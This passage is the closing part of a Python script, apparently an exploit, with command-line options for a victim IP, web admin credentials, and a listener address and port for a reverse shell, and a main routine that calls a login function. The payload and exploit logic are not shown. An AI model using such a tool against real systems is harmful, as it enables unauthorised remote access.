    parser.add_argument("-U", "--ip", type=str, help="Victim IP Address", required=False)
    parser.add_argument("-u", "--username", type=str, help="Username For Web Admin", required=False)
    parser.add_argument("-p", "--password", type=str, help="Password For Web Admin", required=False)
    parser.add_argument("-L", "--lhost", type=str, help="Listener IP Address For Reverse Shell", required=False)
    parser.add_argument("-P", "--lport", type=str, help="Listener Port For Reverse Shell", required=False)

    args = parser.parse_args()

    if args.ip and args.username and args.password and args.lhost and args.lport:
        print(font)
        login(args.ip, args.username, args.password, args.lhost, args.lport)
    else:
        print(font)
        parser.print_help()

if __name__ == "__main__":
    main()
</code></pre>